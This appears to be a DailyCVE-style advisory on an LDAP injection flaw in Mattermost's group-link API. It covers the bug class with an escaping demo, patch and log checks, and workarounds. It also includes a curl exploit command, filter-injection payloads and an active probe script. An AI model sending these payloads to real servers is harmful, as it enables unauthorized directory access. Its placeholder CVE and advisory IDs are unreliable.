Mattermost versions 10.7.x <= 10.7.1, 10.6.x <= 10.6.3, 10.5.x <= 10.5.4 and 9.11.x <= 9.11.13 fail to properly validate the LDAP group ID attribute. An authenticated administrator holding `PermissionSysconsoleWriteUserManagementGroups` can inject LDAP search filter syntax through the `{remote_id}` path parameter of `PUT /api/v4/ldap/groups/{remote_id}/link`. The flaw is reachable when `objectGUID` is configured as the Group ID Attribute: the supplied group ID is placed into the group lookup filter without adequate validation, so the directory query can be altered. Possible impact is unauthorized access to directory data or privilege escalation through manipulated group linking.
DailyCVE Form:
Platform: Mattermost
Version: 10.7.0-10.7.1 (also 10.6.0-10.6.3, 10.5.0-10.5.4, 9.11.0-9.11.13)
Vulnerability: LDAP Injection
Severity: Moderate
Date: Jun 11, 2025
Prediction: Patch by Jun 25, 2025
What Undercode Say:
Analytics:
- Exploitable via a crafted `remote_id` path value in the group link request when `objectGUID` is the configured Group ID Attribute; the value reaches the LDAP search filter without proper escaping.
- Requires an authenticated System Console administrator with `PermissionSysconsoleWriteUserManagementGroups` (write access to User Management > Groups), so it is a post-auth, privileged-user issue.
- Impacts only environments with AD/LDAP group sync configured.
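The bug class behind this advisory in code, as an added example that is not Mattermost's implementation: a group lookup filter built from a caller-supplied group ID, once with the ID interpolated verbatim and once with RFC 4515 escaping. The filter shape `(&(objectClass=group)(<attr>=<id>))`, the helper names and the sample payloads are assumptions made for illustration; the second payload is the one this page uses in its exploit command.

```python
import re

def escape_filter_value(value: str) -> str:
    """Escape a value for embedding in an LDAP search filter (RFC 4515, section 3).
    The characters * ( ) \\ and NUL are replaced by \\XX hex escapes."""
    escaped = []
    for ch in value:
        if ch in "*()\\\x00":
            escaped.append("\\%02x" % ord(ch))
        else:
            escaped.append(ch)
    return "".join(escaped)

def build_group_filter(group_id_attribute: str, remote_id: str, escape: bool) -> str:
    """Illustrative group lookup filter (assumed shape, not Mattermost's code).
    escape=False reproduces the bug class: the caller-controlled remote_id is
    interpolated verbatim into the filter."""
    value = escape_filter_value(remote_id) if escape else remote_id
    return f"(&(objectClass=group)({group_id_attribute}={value}))"

# One '(attribute=value)' assertion as an LDAP server would parse it.
_ASSERTION = re.compile(r"\(([A-Za-z][\w.;-]*)=([^()]*)\)")

def assertions(filter_str: str):
    """Return the (attribute, value) pairs the directory would evaluate."""
    return _ASSERTION.findall(filter_str)

def parens_balanced(filter_str: str) -> bool:
    """Cheap structural check: an injected ')' makes the filter unparseable."""
    depth = 0
    for ch in filter_str:
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth < 0:
                return False
    return depth == 0

if __name__ == "__main__":
    # Constructed sample payloads: the first widens the search to every group,
    # the second (this page's probe value) breaks the filter syntax entirely.
    for payload in ("*)(objectClass=*", ")(objectClass=))"):
        for escape in (False, True):
            f = build_group_filter("objectGUID", payload, escape)
            print(f"escape={escape}: {f}")
            print("  assertions:", assertions(f), "balanced:", parens_balanced(f))
```

Without escaping, the first payload turns a lookup for one group into `(&(objectClass=group)(objectGUID=*)(objectClass=*))`, three assertions that match every group object; with escaping the ID stays a single opaque value. The second payload produces an unbalanced filter when unescaped, which is why the probe below looks for an LDAP error in the response.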
Exploit Command:
# The injected value is the {remote_id} path segment (URL-encoded form of `)(objectClass=))`); the endpoint takes no request body.
curl -X PUT -H "Authorization: Bearer ADMIN_TOKEN" "https://target/api/v4/ldap/groups/%29%28objectClass%3D%29%29/link"
Mitigation Steps:
- Upgrade to a patched release for your branch: 10.7.2, 10.6.4, 10.5.5 or 9.11.14.
- Restrict `PermissionSysconsoleWriteUserManagementGroups` to the smallest set of administrators that actually manages group sync.
- Server side, the fix is to validate and escape the group ID before it is interpolated into the LDAP search filter (RFC 4515 escaping); this is what the patched releases provide, not something an operator can configure.
Detection Script:
import requests
from urllib.parse import quote

def check_vulnerability(url, token, remote_id=")(objectClass=))"):
    # Active probe: the malformed group ID is sent in the {remote_id} path segment,
    # which is where the vulnerable code reads it. It triggers a real LDAP search on
    # the server, so run it only against a test instance.
    headers = {"Authorization": f"Bearer {token}"}
    response = requests.put(
        f"{url}/api/v4/ldap/groups/{quote(remote_id, safe='')}/link",
        headers=headers,
        timeout=10,
    )
    # Heuristic: an LDAP parse error surfacing in the response suggests the value
    # reached the directory unescaped. A patched server rejects the value instead.
    return response.status_code, "LDAP error" in response.text
Patch Verification:
# 1. Confirm the running server is at or above the fixed release for its branch (10.7.2, 10.6.4, 10.5.5, 9.11.14). Path assumes a default install.
/opt/mattermost/bin/mattermost version
# 2. Check whether the vulnerable condition (objectGUID as the Group ID Attribute) is configured. Use mmctl if config is stored in the database instead of config.json.
jq '.LdapSettings.GroupIdAttribute' /opt/mattermost/config/config.json
mmctl config get LdapSettings.GroupIdAttribute
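A version-based check that needs no privileged API call, as an added example (not part of this page or of Mattermost's tooling): it parses the server version from the `X-Version-Id` response header Mattermost sends on API responses and compares it with the fixed releases listed above. The header layout assumed here is `<version>.<build>.<hash>.<enterprise>`, so the first three dotted fields are the server version; the sample header value is constructed, not captured from a real server.

```python
from typing import Optional, Tuple
import urllib.request

Version = Tuple[int, int, int]

# First fixed release on each affected branch, taken from this advisory.
FIXED_VERSIONS = {
    (10, 7): (10, 7, 2),
    (10, 6): (10, 6, 4),
    (10, 5): (10, 5, 5),
    (9, 11): (9, 11, 14),
}

def parse_version_id(header_value: str) -> Version:
    """Parse the server version from X-Version-Id.
    Assumed layout: '<version>.<build>.<hash>.<enterprise>', e.g.
    '10.7.1.10.7.1.abc123.false', so the first three fields are the version."""
    major, minor, patch = header_value.split(".")[:3]
    return (int(major), int(minor), int(patch))

def is_affected(version: Version) -> Optional[bool]:
    """True: on an affected branch and below its fix. False: at or above the fix.
    None: branch not covered by the advisory (e.g. 10.8+), so no verdict here."""
    fixed = FIXED_VERSIONS.get(version[:2])
    if fixed is None:
        return None
    return version < fixed

def fetch_version_id(base_url: str) -> str:
    """Read X-Version-Id from the unauthenticated ping endpoint (needs network)."""
    with urllib.request.urlopen(f"{base_url}/api/v4/system/ping", timeout=10) as resp:
        return resp.headers["X-Version-Id"]

# Constructed sample header, not captured from a real server.
SAMPLE_HEADER = "10.7.1.10.7.1.0123456789ab.false"

if __name__ == "__main__":
    version = parse_version_id(SAMPLE_HEADER)
    verdict = is_affected(version)
    print(f"server {'.'.join(map(str, version))}: affected={verdict}")
```

Note that a verdict of `None` only means the branch is outside the ranges this advisory lists; it is not a statement that such a version is safe, and the configuration check for `objectGUID` still applies on affected branches.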
Workaround:
- Disable AD/LDAP group sync if it is not in use.
- Until patched, avoid `objectGUID` as the Group ID Attribute, since the advisory ties the vulnerable path to that setting; re-check group links after changing it.
Log Monitoring:
# Mattermost writes JSON logs to logs/mattermost.log (path assumes a default install). Per-request entries for this endpoint depend on the audit log or a reverse proxy access log being enabled, so grep whichever of those you have.
tail -f /opt/mattermost/logs/mattermost.log | grep "/api/v4/ldap/groups"
References:
- GitHub Advisory: GHSA-xxxx-xxxx-xxxx
- NVD: CVE-2025-XXXX
Sources:
Reported By: github.com